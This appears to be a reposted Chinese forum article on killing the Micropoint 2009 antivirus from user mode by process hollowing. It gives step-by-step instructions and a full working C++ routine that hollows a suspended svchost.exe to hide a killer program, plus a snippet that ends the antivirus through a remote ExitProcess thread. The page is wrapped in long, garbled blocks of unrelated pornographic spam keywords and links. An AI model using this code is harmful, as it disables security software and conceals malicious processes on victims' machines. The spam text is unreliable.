精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Ring3下WX方法結束微點2009

安全 黑客攻防
微點的主動防御沒有攔截一些系統(tǒng)進程如csrss.exe, smss,exe, lsass.exe, svchost.exe, services.exe等的危險動作。因為這些進程通常是不危險的,我們要做的就是把它們中的某個變成危險進程,然后用這個危險進程猥褻微點。即用進程注入的方法把svhost.exe偷換成TerminateMP.exe(結束微點的程序),也就是所謂的借尸還魂...

微點的主動防御沒有攔截一些系統(tǒng)進程如csrss.exe, smss,exe, lsass.exe, svchost.exe, services.exe等的危險動作。因為這些進程通常是不危險的,我們要做的就是把它們中的某個變成危險進程,然后用這個危險進程猥褻微點。即用進程注入的方法把svhost.exe偷換成TerminateMP.exe(結束微點的程序),也就是所謂的借尸還魂。

操作步驟如下:

1.調用CretaeProcess函數(shù)創(chuàng)建第一個進程(svhost.exe),該進程處于suspend模式(記得參數(shù)CREATE_SUSPENDED ).

2.調用GetThreadContext函數(shù)獲取第一個進程的各個寄存器值.其中EBX的值指向的就是該進程的PEB,EAX寄存器保存了該進程的入口點 (entry point)

3.從PEB中獲取該進程的 base_address, [ebx+8]的值

lkd> dt _peb
ntdll!_PEB
+0x000 InheritedAddressSpace : UChar
+0x001 ReadImageFileExecOptions : UChar
+0x002 BeingDebugged : UChar
+0x003 SpareBool : UChar
+0x004 Mutant : Ptr32 Void
+0x008 ImageBaseAddress : Ptr32 Void            //映像基址
... ...

4.把第二個進程(TerminateMP.exe)讀入到內存中,用ReadFile函數(shù)調用即可,注意如果文件對齊和內存對齊不一樣的話,必須做必要的對齊操作.

5.如果第二個進程和第一個進程有相同的基地址(base-address),并且第二個進程的大小小于第一個進程,則只要簡單的調用WriteProcessMemory函數(shù)覆蓋掉第一個進程的進程空間,然后恢復運行即可.

6.否則的話,先調用ZwUnmapViewOfSection把第一個進程的鏡像映射去掉,該函數(shù)由ntdll.dll導出.然后調用VertualAllocEX函數(shù)在第一個進程內存空間里面申請足夠大的內存.然后拷貝第二個進程的鏡像到該空間(利用WriteProcessMemory函數(shù))

7.假如調用ZwUnmapViewOfSection操作失敗,但是第二個exe是可重定位的.則可以在第一個進程空間里面的任何位置開始申請足夠大的空間,在該分配的空間對第二個進程進行重定位.然后拷貝重定位后的exe到第一個進程空間里,開始位置就是申請的空間位置.

8.用第二個進程(TerminateMP.exe)的base-address修正PEB中相應的值,位置是[ebx+8]

9.用EAX設置第二個進程( TerminateMP.exe )的入口點地址

10.調用SetThreadContext函數(shù)修正

11.調用ResumeThread函數(shù)恢復svhost.exe運行.

實現(xiàn)代碼可以參考 http://bbs.pediy.com/showthread.php?t=41873

這里提供一份更簡短的代碼,便于看清操作過程

BOOL InjectProcess(LPTSTR VictimFile,LPTSTR InjectExe)
{
HANDLE hFile;
DWORD dwFileSize;    //文件大小
IMAGE_DOS_HEADER DosHeader;
IMAGE_NT_HEADERS NtHeader;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT context;
PVOID ImageBase;
unsigned long ImageSize;
unsigned long BaseAddr;
unsigned long retByte = 0;
LONG offset;
HMODULE hNtDll=GetModuleHandle("ntdll.dll");
if(!hNtDll)
return FALSE;
ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtDll,
"ZwUnmapViewOfSection");
memset(&si, 0, sizeof(si));   
memset(&pi, 0, sizeof(pi)); 
si.cb = sizeof(si);

hFile = ::CreateFile(InjectExe,GENERIC_READ,FILE_SHARE_READ|
FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
return FALSE;
}
::SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
dwFileSize = ::GetFileSize(hFile, NULL);
LPBYTE pBuf = new BYTE[dwFileSize];
memset(pBuf, 0, dwFileSize);
DWORD dwNumberOfBytesRead = 0;   
    ::ReadFile( hFile   
        , pBuf   
        , dwFileSize   
        , &dwNumberOfBytesRead   
        , NULL   
        );    
::CopyMemory((void *)&DosHeader,pBuf,sizeof(IMAGE_DOS_HEADER));
::CopyMemory((void *)&NtHeader,&pBuf[DosHeader.e_lfanew],sizeof(IMAGE_NT_HEADERS));
//檢查PE結構
//以掛起方式進程
BOOL res = CreateProcess(NULL,VictimFile,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,
NULL,&si,&pi); 

if (res)
{
context.ContextFlags = CONTEXT_FULL;
if (!GetThreadContext(pi.hThread,&context)) //如果調用失敗
{
   CloseHandle(pi.hThread);
   CloseHandle(pi.hProcess);
   return FALSE;
}
ReadProcessMemory(pi.hProcess,(void *)(context.Ebx + 8),&BaseAddr,sizeof
(unsigned long),NULL);
if (!BaseAddr)
{
   CloseHandle(pi.hThread);
   CloseHandle(pi.hProcess);
   return FALSE;
}
//拆卸傀儡進程內存模塊
if (ZwUnmapViewOfSection((unsigned long)pi.hProcess,BaseAddr))
{
   CloseHandle(pi.hThread);
   CloseHandle(pi.hProcess);
   return FALSE;
}
ImageBase = VirtualAllocEx(pi.hProcess, 
   (void *)NtHeader.OptionalHeader.ImageBase,
   NtHeader.OptionalHeader.SizeOfImage, 
   MEM_RESERVE|MEM_COMMIT, 
   PAGE_EXECUTE_READWRITE); //ImageBase 0x00400000
if (ImageBase == NULL)
{
   DWORD wrongFlag = GetLastError();
   CloseHandle(pi.hThread);
   CloseHandle(pi.hProcess);
   return FALSE;
} 
//替換傀儡進程內存數(shù)據(jù)
if(!WriteProcessMemory(pi.hProcess, ImageBase, pBuf, NtHeader.OptionalHeader.
SizeOfHeaders, &retByte))
{
   DWORD wrongFlag2 = GetLastError(); 
}
//DOS 頭 + PE 頭 + 區(qū)塊表的總大小
//定位到區(qū)塊頭
offset = DosHeader.e_lfanew + sizeof(IMAGE_NT_HEADERS);
IMAGE_SECTION_HEADER secHeader;
WORD i = 0;
for (;i < NtHeader.FileHeader.NumberOfSections;i++)
{
   //定位到各個區(qū)塊
   ::CopyMemory((void *)&secHeader, &pBuf[offset + i*sizeof(IMAGE_SECTION_HEADER)],
sizeof(IMAGE_SECTION_HEADER));
   WriteProcessMemory(pi.hProcess,(LPVOID)((DWORD)ImageBase + secHeader.
VirtualAddress),&pBuf[secHeader.PointerToRawData],secHeader.SizeOfRawData,&retByte);
   VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)ImageBase + secHeader.
VirtualAddress), secHeader.Misc.VirtualSize, PAGE_EXECUTE_READWRITE,&BaseAddr);
}

context.ContextFlags = CONTEXT_FULL;
//重置 執(zhí)行文件入口
WriteProcessMemory(pi.hProcess, (void *)(context.Ebx + 8), 
   &ImageBase,   //4194304
   4, &retByte);
context.Eax = (unsigned long)ImageBase + NtHeader.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(pi.hThread,&context);
ResumeThread(pi.hThread);
}

CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
::CloseHandle(hFile); 
delete[] pBuf;
return TRUE;
}

 

用以上方法啟動 TerminateMP.exe之后,系統(tǒng)中沒有TerminateMP.exe進程,只有被替換了的svhost.exe

在svhost.exe進程中可以輕松地用 OpenProcess打開微點的進程,但是要結束微點的進程還是很麻煩的(Ring3下)。某90后用創(chuàng)建遠程錯誤線程的方法達到了目的(這么挫的方法都想得出來)。

EnableDebugPriv(_T("SeDebugPrivilege"));
HMODULE hModule = GetModuleHandle("kernel32.dll");
unsigned long FunAddr = (unsigned long)GetProcAddress(hModule,"ExitProcess");
for (int i=0;i

 

完整代碼: 進程注入InjectProcess.rar 結束微點TerminateMP.rar

【編輯推薦】

  1. 08年防病毒產品檢驗結果:微軟、微點、360在列
  2. 瑞星就“微點事件”再次發(fā)表聲明
  3. 病毒的模仿秀后門程序偽裝可愛小企鵝
責任編輯:安泉 來源: 看雪軟件安全論壇
相關推薦

2017-08-24 11:00:56

Linux用戶空間內核空間

2009-11-24 14:28:17

APC

2009-02-25 17:22:35

2017-11-24 10:37:49

2009-04-09 13:03:36

2009-12-17 15:32:12

互聯(lián)網

2009-02-17 18:07:38

2009-11-18 09:25:02

linux應用程序

2009-07-24 10:19:29

2009-06-17 16:31:32

2009-08-17 08:39:41

2010-01-05 23:07:44

回眸2009H3C

2009-03-10 10:41:12

H3C無線網絡融合

2009-02-18 16:18:29

江民虛假病毒微點

2009-02-23 12:22:12

2009-02-20 09:54:50

東方微點瑞星

2009-06-10 10:12:32

2009-03-03 17:12:27

H3C峰會IToIP

2010-01-21 10:18:17

成績查詢

2009-11-15 22:11:27

點贊
收藏

51CTO技術棧公眾號

人妻无码久久一区二区三区免费| 国产精品无码专区在线观看| 精品人妻无码一区二区三区| 久久久人成影片一区二区三区在哪下载 | 182在线视频| 成人国产激情在线| 亚洲图片一区二区| 婷婷四月色综合| www.成人精品| 日韩高清不卡一区二区| 欧美成人免费全部观看天天性色| 亚洲av无码一区二区三区观看| 国产精品第一国产精品| 午夜久久久久久久久 | 亚洲小说欧美另类社区| 亚洲一区www| 国产a√精品区二区三区四区| 日韩精品影院| 亚洲电影在线免费观看| 91xxx视频| a视频网址在线观看| 成人国产亚洲欧美成人综合网| 国产精品爽爽爽爽爽爽在线观看| 91久久国产视频| 欧美成人一品| 日韩有码在线观看| 免费人成又黄又爽又色| 乱中年女人伦av一区二区| 69av一区二区三区| 亚洲一级免费观看| 日韩三区免费| 色94色欧美sute亚洲线路一久| 日韩精品免费一区| 老司机精品视频在线观看6| 国产欧美日韩综合精品一区二区 | 日日干夜夜操s8| 午夜欧美巨大性欧美巨大| 亚洲国产aⅴ成人精品无吗| 综合网五月天| 麻豆视频在线观看免费网站| 国产欧美精品在线观看| 欧洲高清一区二区| 欧洲毛片在线| 久久综合九色综合欧美98| 国产伦精品一区二区三区高清 | 国产99久久久精品| 亚洲a在线观看| 国产美女裸体无遮挡免费视频| 爽好多水快深点欧美视频| 18久久久久久| www.国产一区二区| 奶水喷射视频一区| 日韩av免费在线| 中文字幕 国产精品| 可以免费看不卡的av网站| 日本韩国在线不卡| 69视频免费看| 日本不卡一二三区黄网| 国产精品久久综合av爱欲tv| 五月激情丁香网| 久久成人久久爱| 成人在线视频网站| www.国产三级| av成人老司机| 日韩在线三级| 黄网站免费在线播放| 国产精品成人免费精品自在线观看| 永久免费精品视频网站| a视频在线播放| 亚洲一区二区在线观看视频 | 可以直接看的黄色网址| 欧美成熟视频| 欧美亚洲另类视频| 中国女人一级一次看片| 国产一区二区调教| 国产日韩欧美一区二区| 国产69精品久久app免费版| 中文成人av在线| 视色,视色影院,视色影库,视色网| 男女视频在线| 欧美曰成人黄网| 亚洲AV无码久久精品国产一区| 激情小说亚洲图片| 亚洲香蕉成视频在线观看| 国精产品一区一区二区三区mba| 欧美在线精品一区| 日韩暖暖在线视频| 99久久免费国产精精品| bt欧美亚洲午夜电影天堂| 日韩偷拍一区二区| 牛牛精品视频在线| 欧美日韩综合不卡| 午夜免费福利影院| 成人在线国产| 韩国福利视频一区| 中文字幕在线视频免费| 成人三级在线视频| 一区二区三区四区免费视频| 超清av在线| 欧美日韩一区二区三区在线| 中文字幕人妻一区| 日韩精品免费一区二区在线观看 | 免费看日产一区二区三区| 亚洲精品久久久久国产| 九九热视频在线免费观看| 在线亚洲欧美| 91视频-88av| 国产午夜精品一区理论片| 亚洲影院理伦片| 一区二区成人网| 2021年精品国产福利在线| 中文日韩在线观看| 成人午夜视频精品一区| 国产一区二区成人久久免费影院| 美女亚洲精品| 懂色av一区| 91精品国产综合久久久蜜臀粉嫩 | 欧美在线影院一区二区| 永久免费未满蜜桃| 欧美一区国产在线| 国产欧美亚洲视频| 国产三级在线免费| 欧美性xxxxx极品| 日韩黄色一区二区| 欧美激情日韩| 91视频88av| 精品176二区| 在线不卡中文字幕播放| 国产三级黄色片| 全部av―极品视觉盛宴亚洲| 欧美高清性xxxxhd| 日韩电影毛片| 日韩电影免费观看中文字幕| 久久久久久久久久久久久久久久久 | 久久久久日韩精品久久久男男| 国产精品自产拍| 最新欧美精品一区二区三区| 国产高潮免费视频| 欧美久久综合网| 国产国语videosex另类| 男男激情在线| 色婷婷精品久久二区二区蜜臂av| 国产女主播在线播放| 国产精品vip| 成人综合色站| av免费不卡国产观看| 精品国产凹凸成av人网站| 美女毛片在线观看| 成人午夜视频福利| 免费国产黄色网址| 亚洲盗摄视频| 国产精品美女久久久久久免费| av在线电影院| 4438x成人网最大色成网站| 黑人操日本美女| 国产尤物一区二区| 男人添女荫道口女人有什么感觉| 岛国成人av| 欧美一级电影在线| 久久这里精品| 欧美日本在线播放| 欧美成人免费看| 成人免费视频视频在线观看免费| 日本韩国欧美在线观看| 亚洲婷婷丁香| 国产日韩精品在线观看| 影音先锋在线视频| 日韩av中文字幕在线免费观看| 国产亚洲欧美在线精品| 欧美国产激情二区三区 | 电影一区中文字幕| 久久免费观看视频| 国产私拍精品| 这里只有精品免费| 日本一级一片免费视频| 国产欧美日韩精品a在线观看| 亚洲免费成人在线视频| 黄色成人精品网站| 日韩偷拍一区二区| 视频精品国内| 秋霞午夜一区二区| 国产淫片在线观看| 亚洲国产欧美久久| 亚洲综合精品视频| 亚洲国产欧美在线人成| 男人的天堂官网| 豆国产96在线|亚洲| 天天操天天爽天天射| 欧美jjzz| 视频一区亚洲| 国产精品99久久免费观看| 国产精品海角社区在线观看| 在线中文字幕视频观看| 国产午夜精品麻豆| 国产suv精品一区二区69| 欧美色视频日本版| 永久免费看黄网站| 国产女人水真多18毛片18精品视频| a级大片免费看| 丝袜亚洲另类欧美| 男人插女人视频在线观看| 91亚洲自偷观看高清| 农村寡妇一区二区三区| 日韩一区二区三区精品| 国产精品91一区| 超碰成人av| 欧美巨乳在线观看| 91短视频版在线观看www免费| 欧美精品一区二区高清在线观看| 一本到在线视频| 色先锋aa成人| 99免费在线观看| 亚洲精品免费电影| 伊人网在线视频观看| 成人免费观看视频| 亚洲AV无码久久精品国产一区| 免费美女久久99| 久久精品网站视频| 在线午夜精品| 男人的天堂狠狠干| 欧美99在线视频观看| 亚洲午夜精品国产| 日韩美女一区二区三区在线观看| 久久久久久九九九九| 成人爽a毛片免费啪啪红桃视频| 91精品国产综合久久男男| 日本美女久久| 国产精品久久久久999| 韩日成人影院| 青青久久aⅴ北条麻妃| 17videosex性欧美| 久久久日本电影| 国产盗摄在线视频网站| 色综合老司机第九色激情| 动漫一区在线| 久久福利网址导航| 国产原创在线观看| 欧美成人午夜激情| 伊人在我在线看导航| 久久国产精品网站| www在线观看播放免费视频日本| 久久久国产视频91| 最新日本在线观看| 欧美极品少妇xxxxⅹ裸体艺术| 污污视频在线| 国内精品久久久久久久久| 丰满大乳少妇在线观看网站| 久久琪琪电影院| 色戒汤唯在线观看| 日本中文字幕不卡免费| 你懂得影院夜精品a| 国产精品电影一区| 国产69精品久久久久9999人| 国产精品视频一区二区高潮| 日韩欧国产精品一区综合无码| 成人亚洲综合色就1024| 日韩中文字幕在线一区| 少妇高潮惨叫久久久久| 一本色道久久综合一区| 亚洲 欧美 日韩 国产综合 在线| 亚洲激情成人| 蜜臀av无码一区二区三区| 亚洲理伦在线| 黄色片久久久久| 日韩av在线播放中文字幕| 日韩肉感妇bbwbbwbbw| 久久91精品国产91久久小草| 伊人精品视频在线观看| 国产成人综合精品三级| 95视频在线观看| 91视频观看免费| 成年人在线免费看片| 综合色中文字幕| 国产精品.www| 在线视频国内自拍亚洲视频| 国产精品高潮呻吟AV无码| 日韩一区二区三区视频| 五月婷婷在线观看视频| 亚洲天堂av女优| 黄网站在线播放| 97视频在线观看视频免费视频 | 日批免费在线观看| 亚洲欧美精品一区二区| 免费黄网站在线| 97精品伊人久久久大香线蕉 | 成人无码av片在线观看| 亚洲视频1区2区| 日韩在线视频免费播放| 欧美撒尿777hd撒尿| 亚洲精品911| 一道本无吗dⅴd在线播放一区| 91三级在线| 国产精品wwwwww| 中文无码日韩欧| 天堂av一区二区| 亚洲精品1区| 一区二区三区四区毛片| 2024国产精品| 国产精品成人免费一区二区视频| 欧美视频在线一区二区三区| 国产成人三级在线观看视频| 中文字幕在线亚洲| 午夜久久中文| 电影午夜精品一区二区三区| 日韩精品2区| 国产av无码专区亚洲精品| 国产高清久久久久| 2014亚洲天堂| 91传媒视频在线播放| 免费a级片在线观看| 久久九九国产精品怡红院| av在线不卡精品| 欧美高清性xxxxhdvideosex| 国产一区二区中文| 肉色超薄丝袜脚交| 国产精品成人网| 中文字幕欧美在线观看| 亚洲精品一区二区三区婷婷月| 肉肉视频在线观看| 91精品在线一区| 91综合久久一区二区| 欧美一级裸体视频| 久久午夜羞羞影院免费观看| www.99re7.com| 精品国产一区二区在线观看| av在线播放国产| 成人黄色av网站| 久久一区二区三区喷水| 欧美伦理视频在线观看| 久久这里只有精品首页| 中文字幕日韩一级| 亚洲国产精彩中文乱码av| 先锋影音在线资源站91| 91在线色戒在线| 91精品啪在线观看国产81旧版| av在线网址导航| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 国产精品天天av精麻传媒| 久久色成人在线| 手机在线看片1024| 亚洲女人被黑人巨大进入| 涩涩视频网站在线观看| 九九99玖玖| 欧美亚洲免费| 日韩在线免费观看av| 色爱区综合激月婷婷| 999国产在线视频| 91精品久久久久久久久久另类| 欧美xxxxx视频| 久久久九九九热| 一区二区三区不卡视频| 日韩一级片免费在线观看| 91精品国产精品| 国产成人一区| 天天视频天天爽| 亚洲激情av在线| 午夜视频福利在线观看| 日本高清久久天堂| 99久久精品费精品国产| 中文字幕剧情在线观看| 亚洲国产日韩a在线播放| 色哟哟在线观看| 国产精品美女久久久免费| 国产精品传媒精东影业在线| 91香蕉国产线在线观看| 亚洲成人综合视频| 可以在线观看的av| 91欧美激情另类亚洲| 国产字幕视频一区二区| 国产精品无码永久免费不卡| 欧美性猛交xxxxxx富婆| 四虎影院观看视频在线观看| 久草精品电影| 久久se这里有精品| 国产乡下妇女做爰毛片| 亚洲人成电影在线观看天堂色| 欧美极品在线| 拔插拔插海外华人免费| 国产日本欧美一区二区| www.久久久久久久久久| 欧美亚洲成人免费| 99精品美女| 国产一级伦理片| 欧美精品在线观看播放| 成入视频在线观看| 制服国产精品| 91丨九色丨蝌蚪丨老版| 国产精品视频第一页| 欧美在线观看网站| 综合国产精品| 亚洲图片另类小说| 欧美r级在线观看| 亚洲日本在线观看视频| 被灌满精子的波多野结衣| 中文字幕精品一区| 免费观看黄一级视频| 国产日韩在线视频| 亚洲一区网站| 妺妺窝人体色www婷婷| 中文字幕久久久|